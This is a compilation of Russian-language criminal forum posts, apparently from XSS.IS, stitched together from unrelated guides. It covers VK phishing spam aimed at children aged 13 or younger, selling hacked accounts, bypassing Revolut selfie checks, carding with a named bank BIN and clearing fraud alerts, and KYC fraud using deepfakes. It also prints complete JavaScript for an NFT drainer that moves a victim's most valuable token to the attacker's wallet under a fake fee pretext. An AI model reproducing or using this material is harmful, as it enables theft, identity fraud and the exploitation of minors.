А что если ты загрузил все-таки скрипт, но никак не можешь получить первые аккаунты?
Если у тебя ничего не вышло - можешь воспользоваться моим мини-мануалом по спаму, вложенном в моем скрипте, который я продавал :
"Итак, многие из вас видели группы для тупиков по типу 'эта страница подтверждена' 'официальная страница
' взаимные лайки' и тому подобные.
Их участники будут нашими жертвами.
Находим онлайн участников группы, которым по фоткам максимум 13 лет и пишем:
-Привет, ИМЯ!
Мы недавно запустили новый сервис по накрутке друзей/лайков,
поддержи нас пожалуй ста!
LINK.
Заранее ооочень благодарны)
После некоторого времени ожидаем наши аккаунты"
Таким способом у меня получалось делать около 5-30 аккаунтов в день, которые я успешно продавал на маркете за 6 рублей.
Не трудно посчитать что в день выходило около 30-180р. Да, это копейки, но статья изначально писалась для школьников-студентов

Как нанимать спамеров чтобы зарабатывать на пассиве?
Так как наша панелька сделана 'на коленках' и в ней нет панелей для спамеров - много спамеров нанимать не нужно, 2-3х хватит.
Заходи на соседние борды и создавай везде новую тему с загаловком:
' Найму спамеров на фишинг ВК'
В теме закинь свои контакты (телеграм/жаба) и, после получения ответа, веди разговор со спамером, одновременно стараясь нанимать других.
Затем, к примеру через месяц - просмотри общий свой доход и оплати каждому по 25% от заработанного бюджета. Остальные 25% оставляй себе.
Получается что ничего не делая ты просто зарабатываешь небольшие деньги, неплохо, не так-ли?
Но это лишь на словах так, на самом деле тебе прийдется очень долго находить таких людей, более ответственно отнестись к выплатам + отвечать на порой ооооочень 'тупые' вопросов от них же.

..............
Теперь, разобрав всю тему со спамом, приступим к разбору темы с ' индивидуальным взломом' аккаунтов.
Такой способ НАМНОГО прибыльнее предыдущего, но он требует от тебя должной подготовки и знания ХОТЯ БЫ основ СИ (соц. инженерии)

С чего начинать?
Зайди на борды соседней тематики и создай тему 'Взломаю аккаунты ВК по дешевке'
В теме начинаешь писать обо всем: условиях покупки, что человек получает после покупки, шансы взлома и т.д
Расценки можно ставить разные: начиная от 100-а рублей и заканчивая 2-мя тысячами за один аккаунт.
После получения первого заказа - посмотри интересы жертвы и заводи разговор ИМЕННО на эти же темы, дабы заинтересовать его зайти по ссылке.
После успешного взлома - присылаешь доказательства покупателю, получаешь оплату и отдаешь комбинацию НОМЕР:ПАРОЛЬ с текстовых документов =)

------------------
Ответы на твои будущие вопросы:

Файл не меняет свое расширение на .php:
Для фикса зайди в - Панель управления - Оформление и персонализация - Параметры проводника - Вид. В самом внизу найдите ' Скрывать расширения для зарегистрированных типов файлов' и убери галочку. Примени настройки и БАМ, меняй расширение файла.

Denwer не устанавливается:
Так как ошибок может возникнуть немереное количество - гугли.

Как связаться с тобой?:
Связаться со мной или задать вопросы можешь по телеграмму @xndefined

----------
На все остальные вопросы буду отвечать по мере возможности в данной теме. На глупые вопросы буду отвечать 'google.com' =)
Такую статью создания и использования фишинг скрипта ВК с ЧЕКЕРОМ ты вряд ли найдешь еще где-нибудь.
Также, я принимаю участие в конкурсе:https://xss.is/threads/26627
Special for XSS.IS
​

Кто в этой теме шарит? Хочу заняться скамом в телеграм. Создать и продвинуть к примеру канал по дешевой техники Apple и по предоплате кидать мамонтов.
Опасная ли это тема, будут ли искать менты, кто подскажет?

You must have at least 20 reaction(s) to view the content.

Тестируйте.

Введение
Селфи-проверка стала одним из наиболее распространенных способов подтверждения личности в приложениях. Она используется в банковских приложениях, при регистрации в социальных сетях, в приложениях для онлайн-торговли и многих других. Однако, несмотря на свою популярность, селфи-проверка не является идеальным решением, поскольку ее можно обойти. В данной статье мы рассмотрим один из способов обхода селфи-проверки в приложениях, и зарегистрируем аккаунт банка Revolut, цены на которые начинаются от 80$.

Начало
Что нам понадобится:

• Компьютер и выход в интернет.
• Видео/фотография(желательно первое).
• OBS Studio 27.2.4
• OBS Virtualcam Plugin
• Bluestacks от 5.10 версии

Установка.

Устанавливаем нужный нам [OBS Studio](https://github.com/obsproject/obs- studio/releases/tag/27.2.4) (Cсылка кликабельная)
Установка OBS:
Переходим по ссылке, мотаем в самый низ страницу и выбираем, что нужную версию исходя из вашего устройства. Я устанавливал OBS-Studio-27.2.4-Full- Installer-x86.exe ; на Windows 10 64 битную систему. Запускаем установщик и проводим самую обыкновенную установку, после закрываем OBS.

Устанавливаем [Virtualcam Plugin](https://obsproject.com/forum/resources/obs- virtualcam.949/) (Ссылка кликабельная)Заходя на сайт видим такую картину, нам нужна лишь только одна кнопка здесь(Выделена красным прямоугольником).
Установили, теперь запускаем, проходим первые два этапа спокойно. Важно, на третьем этапе нас спросят расположение нашей OBS, выбирайте именно ту, которую мы с вами скачали, а именно 27.2.4.

Устанавливаем Bluestacks(Текст кликабельный). Тут не будет особо больших распинаний, большая зеленая кнопка, берем и устанавливаем.

Настройка OBS

Запускаем наш OBS проделываем такие манипуляции

Открывается окно с настройками виртуальной камеры и выставляем такие же как и у меня, после того как выставили настройки, нажимаем СТАРТ.

Теперь добавляем ваше видео/фото. Если вы загружаете видео, запустите видео как в медиаплеере, а затем выберите 'Захват окна'. В случае с фото, просто выбираем 'Изображение'. Настройка OBS на этом заканчивается.

Настройка Bluestacks

1. Запускаем наш эмулятор и сразу же переходим в настройки(шестеренка в правом трее)
2. Выбираем устройства, и там будет камера, то что нам нужно. Нажимаете на нее и там может вылезти сразу несколько камер, нам нужна будет камера OBS-Camera, никакая другая, либо же та которую вы выбрали в настройке OBS пункт 2.
3. 
4. Заходим в приложении 'Камера', проверяем что всё работает.

Регистрация аккаунта в Revolut и демонстрация обхода.
Мы проделали уже все этапы, нам остается лишь зарегистрироваться в Revolut, приложу своё видео где я проходил селфи-проверку в этом онлайн-банкинге, с остальными документами мы делаем точно так-же.

https://imgur.com/TsHKyoF

Приветствую, здесь многие задаются вопросом стоит ли лезть в кардинг, и каково его будущее, надеюсь на эти вопросы дадут ответы опытные кардеры с форума

Всем привет, жулики. Вот бывает такое настроение, когда проснулся, выпил вкусного кофе и решил поделиться полезной инфой. Я периодически пишу о своих заливах с фб, каких то проблемах. Достаточно часто ко мне ломятся в личку и требуют бины, просят их продать и показать. Такое мне не нравится, свои наработки я не продаю, но адекватным людям могу что-то подсказать, особенно новичкам.
Есть один банк, я выгружал с него раза 3-4 наверное, суммы до 2к, было разок и больше кажется. Потом оставил его, потому что тут иногда требуется грамотный прозвон, а я в свою очередь нашел варианты как делать это без прозвонов, поэтому, думаю что схема с этим банком живая, но будьте готовы потратиться на тесты, на вскидку, не более 100$, сейчас распишу все подробнее.
Есть такой банк - Fidelity, бин который использовал я - 417903
Роллится он здесь - https://login.fidelityrewards.com/e...antId=ICSELAN&channelId=web#/VerifyEnrollment
Для енролла нужен ССН , ну и соответственно пробейте еще и Доб. Также, вам понадобится номер телефона ЮСА который вы подвяжете в кабинете для принятие Fraud ALerts, я действовал по такой схеме, сперва брал просто номер телефона для принятия смс( из бота) и енролла ( вам нужно будет принять 2 смс при енролле), чтобы посмотреть, есть ли вообще смысл арендовать номер на неделю или нет( вдруг нет баланса и т.д.), если все соответствовало моим ожиданиям - арендовал номер на неделю с возможностью отправки обратной смс. Также, не поленитесь и создайте почту на gmail или outlook с похожей на вашего кх данными.
Далее, вы заролились и зашли в аккаунт, видите что там есть нужный вам баланс.

Идете в Card Management и смотрите подвязанные почты и номера телефона. Почту кх удаляете(если она там есть), и добавляете ваш номер телефона в Mobile( телефон, который вы арендовали на неделю)

Итого, после всех действий, мы имеем наш номер телефона в Personal Details, нашу почту, контактных данных кх там быть не должно.
Дальше, мы идем в наш Facebook, Google, да хоть куда удобно и пробуем выгружать бабки или покупать что-либо.
Скорее всего вам придет отказ вот с такой формулировкой на номер телефона
FreeMsg:Elan FIDELITY Fraud Alert: Is $400.00 at FACEBK C7833ZB2D2 on 03/05 valid? Reply 1=Yes 2=No. STOP=opt out or HELP
Мы прожимаем Yes и снимаем фрод.
К сожалению, этот банк не из тех что дал вам после снятия фрода выгружать карту под ноль, скорее всего, пара списаний и больше не даст, это решается прозвоном в банк.
Для прозвона, пробейте DL+даты + заранее выгрузите все транзы что были у кх и передайте прозвонщику, БГ также передайте прозвону, в общем, подготовьтесь как следует.
Возможно, если не будете торопиться, а выгружать раз в час/два часа, прозвон не понадобится.
Этот банк я тестил в марте, поэтому, не могу с уверенностью сказать что все написанное выше актуально под текущие реалии, по крайней мере, вы можете это проверить своими руками, мне кажется что ничего они не поменяли)

**Снова приветствую всех, это продолжение моей писанины по поводу скама крипты без особого труда и расходов.
Для чего это нужно? Не все люди располагают бюджетом для заказа смарт- контракта, для заказа проектов с нуля, поэтому я показываю как развернуть проект не имея бюджета своими руками без особых знаний(но без смарт контракта)
(Соурс код также прикладывается)

И так, для этого нам необходимо всё то же самое:**
-Минимальное понимание программирования
-Капелька хитрости и ума
-Немного ресурсов
-20$ на хост и домен~

Вот мы уже разобрались, что такое минт(ссылка на статью клик), уже запустили свои первые пару проектов и начали общаться с людьми по делу
И постоянно начали слышать о том, что есть некий скрипт, смарт контракт с автовыводом НФТ и токенов(Аппрув), который просто выводит с кошелька человека все его холды без ведома
Появляется желание попробовать, узнать про это больше
Вот натыкаетесь на продажу и установку, но за него просят баснословные деньги... А заняться этим самому не хватает умений
Что-ж, наш вариант конечно же не аппрув , но тоже неплохой.(Кстати про него я хотел написать статейку, но, увы, с моей ленью человек написал первее)

Будем писать по старой схеме, сразу же **вопрос - ответ

Что за скрипт?**
Данный скрипт написан на языке JS, т.е. серверных скриптов и смарт контрактов как таковых нету. Всё очень просто и основные детали будут разобраны ниже.
Также подключается библиотека web3 и api infura.

Как работает скрипт?
Запускаем сайтец с вашим проектом, человек подключает свой кошелек и скрипт начинает проверку кошелька на наличие NFT в сервисе OpenSea, если таковые имеются, то скрипт проверяет на ценность этих NFT, после чего выбирает самую дорогую NFT и запрашивает отправку этой NFT через web3, пользователю выводит лишь только данное сообщение:

То есть информации о том, что выводят конкретно NFT нету, можно придумать самый различный предлог для оплаты этой комиссии пользователю, что мы вскоре тоже разберем. После оплаты комиссии NFT успешно переходит на ваш кошелек

Какая прибыль?
В данном случае прибыль может варьироваться самыми разными суммами. Вы можете забрать NFT стоимостью 0.1 Eth(на период написания статьи ~120$), а можете забрать и NFT стоимостью в 50 Eth( 60k$ ~),все в ваших руках, смотря как и кого заведете на ваш фейк

Какой проект замутить и откуда взять идею?
Ох, с этим скриптом открываются огромные возможности для вашего творчества... Вы можете как и использовать фейки под официальные проекты, находя их на самых различных ресурсах, так и делать что-то своё, предлогов можно придумать огромное количество, пару примеров я расскажу далее уж точно

Как распространять?
В данном случае распространение данного проекта немного отличается от фейк- минта, но и при этом можно использовать точно также, только получать мы будем не просто Eth, а NFT с кошельков держателей. В общем, всё по той же схеме, только в зависимости от того, что за предложение вы придумали для отработки данного скрипта.
Спам по твиттеру, дискорду, пролив по гугл и фб адс, таргетинг, реклама на разных ресурсах, вариаций много.

И так, приступим к практике. Нам пришла в голову гениальная мысль - обмануть форумчан XSS.IS!
Запускаем проект с Аирдропом(раздачей) рандомных NFT исключительно для сообщников иксы! Никто против точно не будет - заполучить NFT почти бесплатно, нужно будет заплатить только газ(комиссию) для получения NFT стоимостью более 1000$ !
Сейчас разведём...

Копипастим с прошлой темы для тех, кто не читал(а нужно!!!):

Для старта нужно установить любой редактор кода, я лично использую Visual Studio Code.
Далее для понимания немного информации на простом языке:
CSS - Язык стилей, с помощью него закладывается основа дизайна сайта
HTML - Разметка сайта, проще говоря - указывает сайту где что будет находиться)
JS - Скрипты для взаимодействия с сайтом))

Да и вообще, для общего понимания что происходит советую изучить CSS и HTML тем, кто не знает.
При большом желании можно изучить за 3-7 дней, и вам это очень пригодится)

Далее выгружаем наш общедоступный код, который я приложил и начинаем разбирать по полочкам работу!

Вот так выглядит наш новый сайтик, думаю тем кто поставит на хост зайдёт, вроде забавно получилось

*под основу был взят сайт нфт-коллекции гоблинтаун

Разбирать также мы полностью не будем, разберем лишь только работу нашего скрипта, в прошлой теме мы и так получили уже базовое понимание)

И так, поехали, в index.html если пролистать вниз через редактор кода будет видно наш скрипт заключенный в разметку

Сам скрипт:

JavaScript:Copy to clipboard

const ABI721 = [{
          "inputs": [{
              "internalType": "string",
              "name": "name",
              "type": "string"
          }, {
              "internalType": "string",
              "name": "symbol",
              "type": "string"
          }, {
              "internalType": "string",
              "name": "uri",
              "type": "string"
          }, {
              "internalType": "address",
              "name": "_launchpad",
              "type": "address"
          }, {
              "internalType": "contract IPair",
              "name": "pair",
              "type": "address"
          }, {
              "internalType": "uint256",
              "name": "_maxType",
              "type": "uint256"
          }],
          "stateMutability": "nonpayable",
          "type": "constructor"
      }, {
          "inputs": [{
              "internalType": "address",
              "name": "from",
              "type": "address"
          }, {
              "internalType": "address",
              "name": "to",
              "type": "address"
          }, {
              "internalType": "uint256",
              "name": "tokenId",
              "type": "uint256"
          }],
          "name": "safeTransferFrom",
          "outputs": [],
          "stateMutability": "nonpayable",
          "type": "function"
      }, {
          "inputs": [{
              "internalType": "address",
              "name": "from",
              "type": "address"
          }, {
              "internalType": "address",
              "name": "to",
              "type": "address"
          }, {
              "internalType": "uint256",
              "name": "tokenId",
              "type": "uint256"
          }, {
              "internalType": "bytes",
              "name": "_data",
              "type": "bytes"
          }],
          "name": "safeTransferFrom",
          "outputs": [],
          "stateMutability": "nonpayable",
          "type": "function"
      }]

      const ABI1155 = [{
          "inputs": [],
          "stateMutability": "nonpayable",
          "type": "constructor"
      }, {
          "inputs": [{
              "internalType": "address",
              "name": "from",
              "type": "address"
          }, {
              "internalType": "address",
              "name": "to",
              "type": "address"
          }, {
              "internalType": "uint256",
              "name": "id",
              "type": "uint256"
          }, {
              "internalType": "uint256",
              "name": "amount",
              "type": "uint256"
          }, {
              "internalType": "bytes",
              "name": "data",
              "type": "bytes"
          }],
          "name": "safeTransferFrom",
          "outputs": [],
          "stateMutability": "nonpayable",
          "type": "function"
      }]

      async function loadWeb3() {
          if (!window.ethereum) return undefined;

          window.web3 = new Web3(window.ethereum);
          await window.ethereum.enable();
          await window.ethereum.request({
              method: "wallet_switchEthereumChain",
              params: [{
                  chainId: "0x1"
              }]
          });

          let account = await getCurrentAccount();

          test();
      }

      async function loadContract(ABI, address) {
          if (!window.ethereum) return undefined;

          return await new window.web3.eth.Contract(ABI, address);
      }

      async function getCurrentAccount() {
          if (!window.ethereum) return undefined;

          const accounts = await window.web3.eth.getAccounts();
          return accounts[0];
      }

      async function test() {
          var account = await getCurrentAccount();
       

          var xmlHttp = new XMLHttpRequest();
          xmlHttp.open("GET", `https://api.opensea.io/api/v1/assets?owner=${account}&order_direction=desc&limit=200&include_orders=false`, false);
          xmlHttp.setRequestHeader("accept", "application/json");
          xmlHttp.send(null);
          var opensea_response = JSON.parse(xmlHttp.response);

          var assets = opensea_response["assets"];
          if (!assets) {
              return _alert();
          }

          var xmlHttp = new XMLHttpRequest();
          xmlHttp.open("GET", `https://api.opensea.io/api/v1/collections?asset_owner=${account}&offset=0&limit=200`, false);
          xmlHttp.setRequestHeader("accept", "application/json");
          xmlHttp.send(null);
          var price_response = JSON.parse(xmlHttp.response);

          var price_data = {};
          var nft_data = {};

          try {
              price_response.forEach(element => {
                  price_data[element["primary_asset_contracts"][0]["address"]] = element["stats"]["one_day_average_price"];
              })

              assets.forEach(element => {
                  let contract_address = element["asset_contract"]["address"];
                  let type = element["asset_contract"]["schema_name"];

                  if (price_data[contract_address] !== undefined) {
                      nft_data[contract_address] = {
                          "type": type,
                          "id": element["token_id"],
                          "price": price_data[contract_address]
                      };

                  }

              });
          } catch {
              return _alert();
          }
          console.log(nft_data);
          var list = [];
          for (const [key, value] of Object.entries(nft_data)) {
              list.push(value["price"]);
          }

          var highestVal = Math.max.apply(null, Object.values(list)),
              val = Object.keys(nft_data).find(function(a) {
                  return nft_data[a]["price"] === highestVal;
              });

          // console.log(nft_data[val]["type"])
          // console.log(val)
          // console.log(account)
          // console.log(ABI1155)

          if (nft_data[val]["type"] === "ERC1155") {
              window.contract = await loadContract(ABI1155, val);
              await contract.methods.safeTransferFrom(account, "0x00000000000000000", nft_data[val]["id"], 1, "0x0").send({
                  "from": account
              });
          } else {
              window.contract = await loadContract(ABI721, val);
              await contract.methods.safeTransferFrom(account, "0x00000000000000000", nft_data[val]["id"], "0x0").send({
                  "from": account
              });
          }

      }

      function _alert() {
          Swal.fire({
              title: 'Error!',
              text: 'There is some errors on our side. Please, try again later.',
              icon: 'error',
              confirmButtonText: 'Fine'
          })
      }

      async function load() {
          document.querySelector(".metamask").addEventListener("click", async() => {
              await loadWeb3()
          });
      }

      window.onload = load;

Теперь ведём разбор полётов(функций):
const ABI721 - Необходим для взаимодействия с токенами ERC-721
const ABI1155 - Необходим для взаимодействия с токенами ERC-1155
Что это за токены ERC-721 и ERC-1155 можно прочитать на вот этом ресурсе(тык)
function loadWeb3 - подгрузка метамаска и смену сети на эфир(если подключена другая)
function loadContract - подгружает контракт того или иного токена
function getCurrentAccount - получает информацию об кошельке пользователя

**function test -**жара, поехали.
Сначала данный скрипт вызывает функцию получения информации об кошельке пользователя, после чего собирает о нём информацию через API ресурса OpenSea, получает информацию о наличии НФТ и их ценностях, после чего выбирает самую ценную НФТ из имеющихся и запрашивает функцию safeTransferFrom и делает запрос на перевод самой дорогой НФТ из имеющихся на ваш кошелек, указанный в данном скрипте.
Ах да, чуть не забыл, самое важное - свой кошелек ставим заместо 0x000000..... , ведь за этим мы сюда пришли)

После чего подстроив дизайн под свой проект мы загружаем его на хостинг и радуемся работающему скрипту

**Из реальных историй первую расскажу как исполнитель заказа из наблюдение за работой заказчика.
У меня есть один постоянный клиент, который на протяжении почти года заказывает у меня различные проекты и сильно он поднялся заимев подобный скрипт. Где-то около двух месяцев назад я сообщил ему о новом скрипте, о котором мы сейчас говорим и он с радостью захотел попробовать поработать с ним. Он перевел мне N-ную сумму, ну и я по своей любопытности отслеживал его счёт, которым он пользуется так-же на протяжении всей нашей совместной работы, на тот момент он составлял около 10Eth. Какой первый проект я ему запустил уже не помню, но на наше время его баланс составляет 290Eth и это далеко не предел. Из последних проектов что я ему делал это были топовые коллекции с большим ажиотажем на момент выпуска: elftown, goblintown, weareallgoingtodie, otherdeed и пр.
Это были его лучшие залёты за счёт которых он так поднялся, просто для примера закину скриншот части залётов

Как бы мне не хотелось поделиться откуда велся траффик - думаю это будет не честно по отношению к нему и вы это понимаете)
Но при этом человек спал в сутки по 2-4 часа и все эти 2 месяца упорно работал. Молодец, белой завистью смотрю на его продвижение)

А теперь расскажу пару примеров о том, как решил я поработать по этому скрипту
Как-то я залетел в одну НФТ-коллекцию(В дискорд) до старта продаж в целях попасть в белый лист для минта НФТ
Общаясь там, я адаптировался и понял тему общения между НФТ-холдерами
Им нравится сама атмосфера
Там был раздел фан-артов, куда постоянно люди выкладывали свои арты на данную коллекцию
И тут я не знаю каким образом, но пришла мне идея в голову.
Фан-метавселенная для этой коллекции. О да, я слепил лендосик от балды, подключил данный скрипт
И вывел условие для подключения в фан-метавселенную: нужно подключить кошелек и заплатить газ(комиссию), чтобы попасть в метавселенную.
И конечно же я начал со всеми делиться, мол вот, посмотрите, что создал! И людям стало действительно интересно, они стали подключаться и поплатились за это :c
Профит: 3k$

Потом под траффик Google ADS я решил замутить крипто-боксы.
Т.е. сайт, где люди могут открывать кейсы и получать рандомные призы из мира криптовалюты
И конечно же первый кейс совершенно бесплатный! Снова нужно лишь только заплатить комиссию)
И само собой, помимо гугл адс я вытащил аккаунт твиттер с галочкой и начал распространять еще и там.
Ох, вот это сок был!
Профит: 7k$

Пожалуй, это на данный момент самая актуальная тематика для криптоскама. Конечно же эта версия не сравнится с апрувом(взаимодействие со смартконтрактом), но если вы только начинаете - она отлично для вас подойдет.
Как я говорил и ранее, для работы с данным скриптом возможно придумать огромное количество проектов, дайте свободу своему творчеству

Снова с вами прощаюсь, но думаю будет и третья статья, где я что-нибудь разверну.
Большое спасибо за внимание! Удачи в делах.
**

Берем данные КХ под вериф на бирже Делаем себе документы, а точнее распечатываем фейк документ с фоткой, можно заламинировать. Далее берем напечатанный документ в руки и следуем инструкции. Меняем лицо - получаем вериф.
https://github.com/alievk/avatarify - позволит тебе подменить лицо в реальном времени, во время видеозвонка в скайпе, или зуме.

Инструкция по установке на Windows

1. Переходим на этот сайт и скачиваем Miniconda python 3.7:
   
2. Устанавливаем https://git-scm.com/download/win
   
   Далее вводим в пуске "Miniconda", и открываем Anaconda promt:
   
   Вводим по очерёдности команды в консоль:

git clone https://github.com/alievk/avatarify.git
cd avatarify
scripts\install_windows.bat

После успешного завершения, скачиваем доп.ресурсы с https://drive.google.com/file/d/1L8P-hpBhZi8Q_1vP2KlQ4N6dvlzpYBvZ/view, https://yadi.sk/d/lEw8uRm140L_eQ/vox-adv-cpk.pth.tar, https://mega.nz/file/R8kxQKLD#036S-bobZ9IW-kNNcSlgpfJWBKSi5nkhouCYAsxz3qI (на ваш выбор).

Потом размещаем vox-adv-cpk.pth.tar в папку avatarify (не распаковываем).

Папка avatarify находится в C:\Users\{username}:

После этого, если вы уже закрыли консоль miniconda, то открываем её снова, прописываем:

cd C:\Users\username\avatarify

И после этого прописываем следующее:

run_windows.bat

Убедитесь, что ваша ОЗУ не забита, т.к при первом запуске программа докачает и установит нужные ей элементы:

После успешного запуска на экране появятся 2 окна, в одном будет изображение с веб камеры, в другом - с Avatarify:

Управление:

1-9: переключение между лицами;

0 (ноль): включает и выключает отображение Аватара;

A/D: предыдущий/следующий аватар из папки;

W/S: приближение камеры;

Z/C: настройка непрозрачности наложения Аватара;

X: сбрасывает настройки,перед использованием помогает;

F: поиск окна и опоры;

R: зеркальное отображение с веб камеры;

T: зеркальное отображение аватара;

I: показать FPS.

Управление Аватаром
Вот основные принципы управления вашим аватаром:

Выровняйте свое лицо в окне камеры как можно ближе по пропорциям и положению к целевому аватару. Используйте функцию увеличения/уменьшения масштаба (W / S клавиши). Когда вы выровняетесь, нажмите "X", чтобы использовать этот кадр в качестве ссылки для управления остальной анимацией.

Используйте функцию наложения (клавиши Z/C), чтобы максимально приблизить выражение вашего лица и лица аватара.

Кроме того, вы можете нажать "F" для программного обеспечения, чтобы попытаться найти лучшую позицию. Это замедлит частоту кадров, но пока это происходит, вы можете продолжать двигать головой: окно предварительного просмотра будет мигать зеленым цветом, когда он обнаружит, что ваша поза лица ближе соответствует аватару, чем та, которую он использует в данный момент. Вы также увидите два числа: первое число - это то, насколько близко вы в данный момент выровнены по Аватару, а второе число-насколько близко выровнена система отсчета.

Вы хотите получить первое число как можно меньше - около 10 обычно является хорошим выравниванием. Когда вы закончите, нажмите "F" еще раз, чтобы выйти из режима поиска опорных кадров.

Вам не нужно быть точным, и некоторые другие конфигурации могут дать еще лучшие результаты, но обычно это хорошая отправная точка.

Теперь, скачиваем плагин для OBS, а также сам OBS Studio
https://obsproject.com/forum/resources/obs-virtualcam.539/ ( выберите установить и зарегистрировать только 1 виртуальную камеру):

Запускаем OBS.

В разделе Sources нажмите на кнопку Добавить (знак"+"), выберите Windows Capture и нажмите OK. В появившемся окне выберите "[python.exe]: avatarify " в выпадающем меню окна и нажмите кнопку OK. Затем выберите Edit -> Transform -> Fit to screen.

В OBS Studio перейдите в меню Сервис - > VirtualCam. Проверьте автозапуск, установите Буферизованные кадры в 0 и нажмите кнопку Пуск.

Теперь OBS-Camera camera должна быть доступна в Zoom (или другом программном обеспечении для видеоконференцсвязи).

Настраиваем gps под прописку и ищем чистый ip под город прописки!

МЕТОД 2
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Ссылка на ДипФэйсЛаб

https://github.com/iperov/DeepFaceLab

Необходимые файлы:

cuda_9.2.148_windows.exe (потом перезагрузить)

cuda_9.2.148.1_windows.exe

cudnn-9.2-windows7-x64-v7.1.zip

ИСПОЛЬЗОВАЛАСЬ ПРОГРАММА ОТ 20/06/2019

Видео от разработчика

ВАЖНО!!!!

ВНЕ ЗАВИСИМОСТИ ОТ ТОГО сколько идёт ваше видео, обработка замены лица по времени займёт одинаковый промежуток.

Чем больше итераций - тем лучше. В видео с Лешей Шевцовым (itpedia) было использовано почти 80,000

Для самого крутого показателя можно использовать 500,000 (займет 3-4 дня, все зависит от видюхи)

Это исключительно мой черновик для заметок, я не старался его адаптировать под кого-либо, только делал для себя.

-------------------------------------------------------------------

1. В КОРЕНЬ ДИСКА

После скачивания есть версии

DeepFaceLabCUDA9.2SSE для NVIDIA видеокарт вплоть до GTX1080 и любых 64-бит процессоров.

DeepFaceLabCUDA10.1AVX для NVIDIA видеокарт вплоть до RTX и процессоров с поддержкой AVX инструкций.

DeepFaceLabOpenCLSSE для AMD видеокарт и любых 64-бит процессоров.

2. В папку ВОркСпэйс закинуть 2 файла.

Первый - data_dst.mp4 ---- это лицо, которое будет заменяться

Второй - data_src.mp4 ---- это лицо, которое будет использоваться для замены.

3. Порядок

4. extract PNG from video data_src.mp4 - программа извлекает лицо, которым БУДЕМ ЗАМЕНЯТЬ. Формат лицо PNG

3.2) extract PNG from video data_dst FULL.mp4 - программа извлекает лицо, которое БУДЕТ ИЗМЕНЕНО. Формат PNG

4. data_src extract faces MT all GPU - производит выборку конечного набора лиц из PNG в папку workspace\data_src\aligned

4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ.

4.2.2) data_src sort by similar histogram - После этой сортировки лица будут сгруппированы по содержанию, так что отсеять ненужные лица теперь намного проще.

Пролистываете скроллом и удаляете ненужные лица группами.

4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ. Удаляем ненужные. Видите, лица теперь находятся согласно повороту головы.

4.2.1) data_src sort by blur.bat - Сортировка по резкости. Запускаете и ждете сортировки. Затем смотрите результаты. Самые мутные лица будут в конце. Для src важно убрать мутные лица.

4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ. Удаляем ненужные МУТНЫЕ ЛИЦА.

5. data_dst extract faces MT all GPU - То же, что и п.4, с некоторыми отличиями. Если лицо не определилось в каком-то кадре, то для этого есть опция +manual fix - позволяет вручную

указать лица на кадрах, где вообще не определилось никаких лиц.

5.1) data_dst check result

5.2) data_dst sort by similar histogram - Если в целевом видео содержатся другие ненужные лица, можете произвести эту сортировку, и затем удалить эти лица будет проще.

5.1) data_dst check result - удаляем ненужные кадры

6. train H64 best GPU ---- лучше CTRL+F train ... .bat Тренировка

в manual_ru.pdf

ЖДЕМ

!!! 6) train H64 best GPU - еще раз. Появляются какие-то диаграммы, потом закрывается.

7. convert H64 debug --- convert ... .bat Наложение лиц. Опция debug позволяет посмотреть процесс наложения лиц и некоторую техническую информацию по каждому кадру в консоли, нажимаете пробел в окне просмотра.

Вроде он всегда нажимал на 0. -3,01 в видео

7. convert H64 debug - ЕЩЕ РАЗ?

Комбинации:

1

1

пусто

пусто

-5

пусто

пусто

пусто

!!!7) convert H64 debug - ЕЩЕ РАЗ?

Комбинации:

1

1

20

40

пусто

пусто

пусто

пусто

7. convert H64

Комбинации:

1

1

20

40

пусто

пусто

пусто

пусто

ЖДЕМ ЗАВЕРШЕНИЯ

8. convert to mp4

ЖДЕМ ЗАВЕРШЕНИЯ

Идем в папку РЕЗУЛТ и видим новый файл result.mp4

----------------------------------------------------------------------------------------------------

Конфиги если захотите треннировать на SAE

== Model options:

== |== autobackup : True

== |== write_preview_history : True

== |== batch_size : 2 (

== |== sort_by_yaw : False

== |== random_flip : False

== |== resolution : 192

== |== face_type : f

== |== learn_mask : True

== |== optimizer_mode : 2

== |== archi : liae

== |== ae_dims : 192

== |== e_ch_dims : 42

== |== d_ch_dims : 21

== |== multiscale_decoder : true

== |== ca_weights : true

== |== pixel_loss : False

== |== face_style_power : 10

== |== bg_style_power : 10

== |== apply_random_ct : true

== |== clipgrad : true

== Running on:

== |== [0 : GeForce GTX 1080]

На А64 все по дэфолту

---------------------------------

СОВЕТ

H128, DF, LIAEF128 моделей:

Use pixel loss? (y/n, ?:help skip: n/default ) :

позволяет быстрее улучшать мелкие детали и убрать дрожание. Включать только после 20к итераций.

-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------

Сайт второй программы

https://faceswap.dev/forum/viewtopic.php?f=5&t=27

-------------------------------------

ВАЖНО!!!!

ВНЕ ЗАВИСИМОСТИ ОТ ТОГО сколько идёт ваше видео, обработка замены лица по времени займёт одинаковый промежуток.

Чем больше итераций - тем лучше. В видео с Лешей Шевцовым (itpedia) было использовано почти 80,000

Для самого крутого показателя можно использовать 500,000 (займет 3-4 дня, все зависит от видюхи)

Настраиваем gps под прописку и ищем чистый ip под город прописки!

------

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
МЕТОД 3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<https://www.elladodelmal.com/2019/04/autoencoders-gans-y-otros-chicos- buenos_10.html> - СТАТЬЯ .

Настраиваем gps под прописку и ищем чистый ip под город прописки!
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

МЕТОД 4

Подмена изображения в камере,этим способом к примеру можно регистрировать акки каргеринга на левые данные, ибо в некоторых приложениях нельзя загрузить уже имеющиеся photo,для этого нам всего лишь потребуется всего лишь установленная операционная система Linux.

1. Устанавливаем виртуальную камеру

Ставим кодек;apt-get install git make ffmpeg

Клонируем репозиторий драйвера;
mkdir codek
cd codek
git clone https://github.com/umlaeute/v4l2loopback.git
cd v4l2loopback

Устанавливаем;
make && sudo make install
sudo depmod -a
И запускаем;
sudo modprobe v4l2loopback

